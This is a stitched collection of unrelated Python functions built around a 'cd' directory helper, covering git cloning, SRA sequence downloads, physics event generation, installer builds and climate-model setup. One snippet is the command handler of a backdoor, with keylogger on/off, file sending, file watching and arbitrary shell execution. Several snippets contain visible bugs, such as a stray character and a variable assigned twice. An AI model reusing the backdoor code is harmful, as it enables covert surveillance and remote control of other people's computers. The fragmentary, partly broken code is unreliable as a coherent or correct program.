def get_clither(): """Get clither.""" print('Getting clither...') if os.path.exists(paths.clither_path): run_cmd(cd(paths.clither_path), 'git pull') return run_cmd(cd(paths.base_dir), 'git clone ' + paths.clither_base_repo)
def execute(self, cmd): print("Executing command: {}".format(cmd)) result = "" if cmd[:3] == 'cd ': try: helpers.cd(cmd[3:]) except OSError as e: result = str(e) elif cmd[:4] == 'GET ': filename = cmd[4:] if not os.path.exists(filename): result = "File doesn't exist\n" else: self.fileTransfer.sendFile(filename) elif cmd[:5] == 'KEYON': if self.keylogger.start(): result = "Started keylogger\n" else: result = "Keylogger started already\n" elif cmd[:6] == 'KEYOFF': if self.keylogger.stop(): result = "Stopped keylogger\n" else: result = "Keylogger already stopped\n" elif cmd[:6] == 'WATCH ': self.addWatch(cmd[6:]) result = "Added watch\n" elif cmd[:8] == 'RMWATCH ': if self.removeWatch(cmd[8:]): result = "Removed watch\n" else: result = "File or directory don't have watch\n" elif cmd[:5] == 'CLOSE': print("Backdoor closed...\n") sys.exit(0) else: result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) result = result.stdout.read() + result.stderr.read() if result != "": print("Result: %s" % result) self.saveResult(result) time.sleep(0.1)
def trim_sra(): # check for SRA folder and file existance if not os.path.exists(arguments.dir + '/SRA'): print('''There is no directory /SRA in {dir}. Either create this directory in {dir} or use the --download flag to create the directory and download SRA files to it'''.format(dir = arguments.dir)) if not os.path.exists(os.path.exists(arguments.dir + '/SRA/' + SRA)): print("There is no file {file} in {dir}".\ format(file = SRA, dir = arguments.dir))ß # check if SRA_trimmed directory exists, if not create it if not os.path.exists(arguments.dir + '/SRA_trimmed'): print(time.strftime('[%a, %I:%M]'), 'Creating directory /SRA_trimmed..') os.makedirs(arguments.dir + '/SRA_trimmed') with cd(arguments.dir + '/SRA_trimmed/'): print(time.strftime("[%a, %I:%M]"), "Trimming " + SRA + ".fastq.gz ...") # call tim_galore using the SRA accension. Pass flag if paired. if arguments.paired: file_1 = arguments.dir + '/SRA/' + SRA + "_1.fastq.gz" file_1 = arguments.dir + '/SRA/' + SRA + "_2.fastq.gz" call(["trim_galore", file_1, file_2, "--paired", ">",\ "../log/trim_galore_output_{}.txt".\ format(time.strftime("[%a:%I:%M]"))]) else: call(["trim_galore", arguments.dir + '/SRA/' + SRA + \ ".fastq.gz", ">", "../log/trim_galore_output_{}.txt".\ format(time.strftime("[%a:%I:%M]"))])
def generate_events_locally(self, nruns = 1, nevents = 10000): self.setup_for_generation(nruns, nevents) with cd(self.directory): for run in range(0, nruns): sp.call(['./bin/generate_events','--laststep=delphes', '-f']) sp.call(['./bin/madevent','remove','all', 'parton', '-f']) sp.call(['./bin/madevent','remove','all', 'pythia', '-f']) sp.call('rm -rf Events/run_*/tag_*_delphes_events.root', shell = True)
def call_update(plp_update_to_version): if LooseVersion(plp_update_to_version) == LooseVersion(PACKAGE_JSON_DATA['version']): print '\n\nRefusing to update. Allready at {0}'.format(PACKAGE_JSON_DATA['version']) return if LooseVersion(plp_update_to_version) < LooseVersion('1.0.4'): print '\n\nRefusing to {2} from {0} to {1}. Anything less than 1.0.4 is just not acceptable.'.format( PACKAGE_JSON_DATA['version'], plp_update_to_version, 'downgrade' if LooseVersion(plp_update_to_version) < LooseVersion(PACKAGE_JSON_DATA['version']) else 'upgrade' ) return print '\n\n{2}grading from {0} to {1}.'.format( PACKAGE_JSON_DATA['version'], plp_update_to_version, 'Down' if LooseVersion(plp_update_to_version) < LooseVersion(PACKAGE_JSON_DATA['version']) else 'Up' ) REMOTE_PLEVI = 'https://github.com/Piletilevi/printsrv/releases/download/{0}/plevi_{0}.zip'.format(plp_update_to_version) update_dir = path.join(BASEDIR, 'update') LOCAL_PLEVI = path.join(update_dir, path.basename(REMOTE_PLEVI)) ensure_dir(update_dir) with cd(BASEDIR): with open('update.bat', 'w') as infile: infile.write('cd /d {0}\n'.format(update_dir)) infile.write('for %%i in (*) do move "%%i" ..\n') infile.write('for /d %%i in (*) do rmdir "../%%i" /s /q\n') infile.write('for /d %%i in (*) do move "%%i" ..\n') infile.write('cd ..\n') infile.write('rmdir update /s /q\n') infile.write('printsrv.exe "{0}"\n'.format(PLP_FILENAME)) infile.write('del update.bat\n'.format(PLP_FILENAME)) with cd(update_dir): if dlfile(REMOTE_PLEVI, LOCAL_PLEVI): print 'Unpacking {0}'.format(LOCAL_PLEVI) with ZipFile(LOCAL_PLEVI, 'r') as z: z.extractall(path.join(path.dirname(LOCAL_PLEVI))) remove(LOCAL_PLEVI) else: exit(1) execl('update.bat', 'update.bat') exit(0) # Will not reach this line, but for sake of readability.
def clone_addons(addons): """Clone addons. args: addons: (list) Addons to clone. """ print('Cloning addons...') used_addons = set() for url in addons: addon_name = os.path.basename(url) git_repo_comp = re.compile(r'https?://(.+?)(.git)*$') match = git_repo_comp.match(url) trucated_url = addon_name if match: trucated_url , _ = match.groups() new_addon_name = get_new_path( trucated_url, paths.custom_addons_path, '') print('add ' + new_addon_name) used_addons.add(new_addon_name) if os.path.exists(new_addon_name): run_cmd(cd(new_addon_name), 'git pull') continue run_cmd(cd(paths.custom_addons_path), 'git clone ' + url) addon_path = os.path.join(paths.custom_addons_path, addon_name) os.rename(addon_path, new_addon_name) #TODO(xnz): absract to helper print('rename {0} to {1}'.format(addon_path, new_addon_name)) existing_addons = set( os.path.join(paths.custom_addons_path, entry) for entry in get_dir_list(paths.custom_addons_path)) extra_addons = existing_addons - used_addons if extra_addons: print('You have untracked addons: ' + ', '.join(extra_addons))
def do(self): with helpers.cd(self.source): branch = getattr(self, 'branch', 'master') remote = getattr(self, 'remote', 'origin') git_status = helpers.run('git', 'status', '--porcelain', verbose = False).strip() helpers.run('git', 'checkout', branch) if git_status: helpers.run('git', 'reset', '--hard', branch) helpers.run('git', 'fetch', remote, branch) helpers.run('git', 'merge', '--ff-only', '%s/%s' % (remote, branch)) helpers.run('git', 'submodule', 'init') helpers.run('git', 'submodule', 'update') self.revision = helpers.run('git', 'rev-parse', '--short', 'HEAD', verbose = False).strip() if self.options.get('dest'): raise Exception("Haven't figured out the proper set of `git archive` commands yet") helpers.run('git', 'archive', '-o', self.options.get('dest') / ('%s.zip' % self.revision), branch) with helpers.cd(self.options.get('dest')): # TODO: this doesn't work. helpers.run('unzip', 'archive.zip')
def do(self): with helpers.cd(self.source): branch = getattr(self, 'branch', 'master') remote = getattr(self, 'remote', 'origin') git_status = helpers.run('git', 'status', '--porcelain', verbose=False).strip() helpers.run('git', 'checkout', branch) if git_status: helpers.run('git', 'reset', '--hard', branch) helpers.run('git', 'fetch', remote, branch) helpers.run('git', 'merge', '--ff-only', '%s/%s' % (remote, branch)) helpers.run('git', 'submodule', 'init') helpers.run('git', 'submodule', 'update') self.revision = helpers.run('git', 'rev-parse', '--short', 'HEAD', verbose=False).strip() if self.options.get('dest'): raise Exception( "Haven't figured out the proper set of `git archive` commands yet" ) helpers.run( 'git', 'archive', '-o', self.options.get('dest') / ('%s.zip' % self.revision), branch) with helpers.cd(self.options.get('dest')): # TODO: this doesn't work. helpers.run('unzip', 'archive.zip')
def download_sra(): # check if SRA directory exists, if not create it if not os.path.exists(arguments.dir + '/SRA'): print(time.strftime('[%a, %I:%M]'), 'Creating directory /SRA..') os.makedirs(arguments.dir + '/SRA') # move to newly created directory, download SRA files with cd(arguments.dir + '/SRA'): print(time.strftime("[%a, %I:%M]"), "Downloading SRA file: " + SRA\ + " to " + arguments.dir + '/SRA') # call fastq-dump using the SRA accension. if arguments.paired: call(["fastq-dump", "--split-files", SRA, "-gzip", ">",\ "../log/fastq_dump_log_{}.txt".\ format(time.strftime("[%a:%I:%M]"))]) else: call(["fastq-dump", SRA, "-gzip", ">",\ "../log/fastq_dump_log_{}.txt".\ format(time.strftime("[%a:%I:%M]"))])
def run_analysis_on_originals(): analysis = CutAndCountAnalysis() m_R = 0.0 m_T_R = 0.0 analysis.write_analysis_cpp('CutAndCountAnalysis', m_R, m_T_R) with cd('CutAndCountAnalysis/Build'): devnull = open(os.devnull, 'w') sp.call(['make']) analysis_name = str(int(m_R)) + '_GeV_m_R_' + str( int(m_T_R)) + '_GeV_m_T_R' for process in tqdm(signals, ncols=60): process.make_original_input_list('CutAndCountAnalysis') process.analyze_originals('CutAndCountAnalysis', analysis_name) """
def do(self): with helpers.cd(self.installer_script.parent): print '*** running makensis with options %r ***' % (self.options,) helpers.run(self.nsis_exe, '/V4', self.installer_script)
def do(self): with helpers.cd(self.script.parent): helpers.run(self.path_nsis, '/V4', self.script)
def do(self): with helpers.cd(self.path): self.upload_dir_to_s3(self.build_identifier) print '*** done uploading ***'
def setup_for_generation(self, nruns, nevents): self.copy_cards() with cd(self.directory): self.write_pbs_script(nruns) modify_file('Cards/run_card.dat',set_beam_energy) modify_file('Cards/run_card.dat', lambda x: re.sub(r'\d* = nev', str(nevents)+" = nev", x))
def create_run(settings=settings, experiment=settings.experiment): # copy template structure to new experiment location try: shutil.copytree(settings.coupl_template_dir, settings.experiment_dir, symlinks=True) except OSError as error: print(error) print("Choose a different experiment name or remove " + settings.experiment_dir) sys.exit(1) for d in ['x_MOM-to-PISM','x_PISM-to-MOM']: dir_path = os.path.join(settings.experiment_dir,d) if not os.path.exists(dir_path): os.mkdir(dir_path) print(f" > created experiment directory {settings.experiment_dir}") # create main coupling script from template create_script_from_template(settings, "run_coupled.sh.jinja2") # prepare PISM subdirectory PISM_folders = ['initdata', 'prerun', 'results'] for f in PISM_folders: fpath = os.path.join(settings.pism_exp_dir, f) if not os.path.exists(fpath): os.makedirs(fpath) print(f" - created directory PISM/{f}") # copy PISM binary to experiment dir if not os.path.exists(settings.pism_exp_bin_dir): os.makedirs(settings.pism_exp_bin_dir) shutil.copy2(settings.pism_sys_bin, settings.pism_exp_bin_dir) print(f" - copied PISM binary {settings.pism_sys_bin} to PISM/bin") # copy PISM input files to PISM/initdata/ pism_input_files_to_copy = [ settings.pism_infile_path, settings.pism_atm_data_path, settings.pism_ocn_data_path, settings.pism_ocnkill_data_path] for f in pism_input_files_to_copy: shutil.copy2(f, os.path.join(settings.pism_exp_dir, 'initdata')) print(f" - copied PISM input file {f} to PISM/initdata") # prepare pism config_override file pism_config_dict = get_pism_config_as_dict(settings) check_if_override_is_in_config(settings, pism_config_dict) create_script_from_template(settings, "config_override.cdl.jinja2") cmd = "ncgen3 "+os.path.join(settings.pism_exp_dir,"initdata","config_override.cdl") \ +" -o "+os.path.join(settings.pism_exp_dir,"initdata","config_override.nc") os.system(cmd) print(" - created PISM/config_override.nc from PISM/config_override.cdl") # create pism run scripts from template create_script_from_template(settings, "pism_prerun_script.sh.jinja2") create_script_from_template(settings, "pism_run_script.sh.jinja2") ## prepare POEM subdirectory # delete all content first for filename in os.listdir(settings.poem_exp_dir): file_path = os.path.join(settings.poem_exp_dir, filename) try: if os.path.isfile(file_path) or os.path.islink(file_path): os.unlink(file_path) elif os.path.isdir(file_path): shutil.rmtree(file_path) except Exception as e: print(f'Failed to delete {file_path}. Reason: {e}') # copy from template #shutil.copytree(settings.poem_template_dir, settings.poem_exp_dir, # dirs_exist_ok=True, symlinks=True) dist.copy_tree(settings.poem_template_dir, settings.poem_exp_dir, preserve_symlinks=1, update=1, verbose=1) print(f" - copied POEM template {settings.poem_template_dir} to POEM") # a new coupled run (not restarting from a previous coupled run) if settings.coupled_restart==False: # copy inital PISM-to-MOM fluxes for the first coupling iteration shutil.copy2(settings.pism_to_mom_flux_init_path, os.path.join(settings.experiment_dir, 'x_PISM-to-MOM')) print(f" - copied initial PISM-to-MOM flux file "\ f"{settings.pism_to_mom_flux_init_file} from "\ f"{settings.pism_to_mom_flux_init_path} for ice to ocean "\ f"fluxes in first coupling iteration") # further stuff to do when doing a restart from a previous coupled run if settings.coupled_restart==True : # copy PISM-to-MOM fluxes file if doing a restart from previous run shutil.copy2(settings.pism_to_mom_flux_restart_path, os.path.join(settings.experiment_dir, 'x_PISM-to-MOM')) print(f" - copied PISM-to-MOM flux file "\ f"{settings.pism_to_mom_flux_restart_file} from "\ f"{settings.restart_dir} to restart from previous run") # copy MOM restart files from previous run poem_input_dir = os.path.join(settings.poem_exp_dir,'INPUT') poem_restart_files_dir = os.path.join(settings.restart_dir,'POEM/INPUT') if os.path.exists(poem_restart_files_dir): with helpers.cd( str(poem_restart_files_dir) ): cmd = f"for i in *.res*; do rm {poem_input_dir}/$i; "\ f"cp -a $i {poem_input_dir} ; done" #subprocess.run("ls", capture_output=True) #subprocess.run("ls", stdout=subprocess.PIPE, stderr=subprocess.STDOUT) subprocess.call(cmd, shell=True) print(f" - copied MOM restart files from {poem_restart_files_dir} "\ "to POEM/INPUT") else: warmings.warm(f"WARNING: path {poem_restart_files_dir} does not "\ f"exist! Need to copy MOM restart files to INPUT dir by "\ f"hand...") if (settings.do_ocean_tracer_anomaly==True and settings.use_ocean_tracer_anomaly_from_prev_run==True): # copy ocean tracer anomaly reference file from previous run if os.path.exists(settings.ocean_tracer_anomaly_reference_path): shutil.copy2(settings.ocean_tracer_anomaly_reference_path, os.path.join(settings.experiment_dir, 'x_MOM-to-PISM')) print(f" - copied ocean tracer anomaly reference file "\ f"{settings.ocean_tracer_anomaly_reference_file} of "\ f"{settings.restart_dir} to compute ocean tracer anomalies "\ f"to same reference like in previous run") else: warnings.warn(f"path {settings.ocean_tracer_anomaly_reference_path} "\ f"does not exist!") if (settings.do_ocean_sealevel_anomaly==True and settings.use_ocean_sealevel_anomaly_from_prev_run==True): # copy ocean sealevel anomaly reference file from previous run if os.path.exists(settings.ocean_sealevel_anomaly_reference_path): shutil.copy2(settings.ocean_sealevel_anomaly_reference_path, os.path.join(settings.experiment_dir, 'x_MOM-to-PISM')) print(f" - copied ocean sealevel anomaly reference file "\ f"{settings.ocean_sealevel_anomaly_reference_file} of "\ f"{settings.restart_dir} to compute ocean sealevel anomalies "\ f"to same reference like in previous run") else: warnings.warn(f"path {settings.ocean_sealevel_anomaly_reference_path} "\ f"does not exist!") # [end] if settings.coupled_restart==True # copying PISM runoff reference file for calculation of ice to ocean runoff # with sea level impact if settings.do_runoff_slc == True: if settings.runoff_reference_surf_accum == True: if settings.coupled_restart == True: # copy ice-to-ocean runoff reference file from previous run if os.path.exists(settings.runoff_reference_restart_path): shutil.copy2(settings.runoff_reference_restart_path, os.path.join(settings.experiment_dir, 'x_PISM-to-MOM')) print(f" - copied PISM to MOM runoff reference file "\ f"{settings.runoff_reference_restart_path} "\ f"from previous run (computed from PISM surface "\ f"accumulation flux) to identify the part of ice "\ f"to ocean runoff which changes sea level in the "\ f"ocean") else: warnings.warn(f"WARNING: tried to copy PISM runoff "\ f"reference file, but path "\ f"{settings.runoff_reference_restart_path} "\ f"does not exist!") else: # runoff_reference_surf_accum == False # copy pre-computed ice-to-ocean runoff reference file if os.path.exists(settings.runoff_reference_path): shutil.copy2(settings.runoff_reference_path, os.path.join(settings.experiment_dir, 'x_PISM-to-MOM')) print(f" - copied pre-computed PISM runoff reference file "\ f"{settings.runoff_reference_path} to identify to "\ f"part of ice to ocean runoff which changes sea level "\ f"in the ocean") else: warnings.warn(f"WARNING: tried to copy PISM runoff reference file, "\ f"but path {settings.runoff_reference_path} does "\ f"not exist!")
def do(self): with helpers.cd(self.installer_script.parent): print '*** running makensis with options %r ***' % (self.options, ) helpers.run(self.nsis_exe, '/V4', self.installer_script)
def run_clither(args): flags = ' '.join(args) if not args: flags = '--setup_custom --install' run_cmd(cd(paths.clither_path), './clither.py ' + flags)
def do(self): if self.cancel: return with helpers.cd(self.path): self.upload_dir_to_s3('install', compress=False, mimetypes=True)
def generate_events(self, nruns = 1, nevents = 10000): self.setup_for_generation(nruns, nevents) with cd(self.directory): sp.call(['qsub', 'submit.pbs'], stdout = open(os.devnull, 'w'))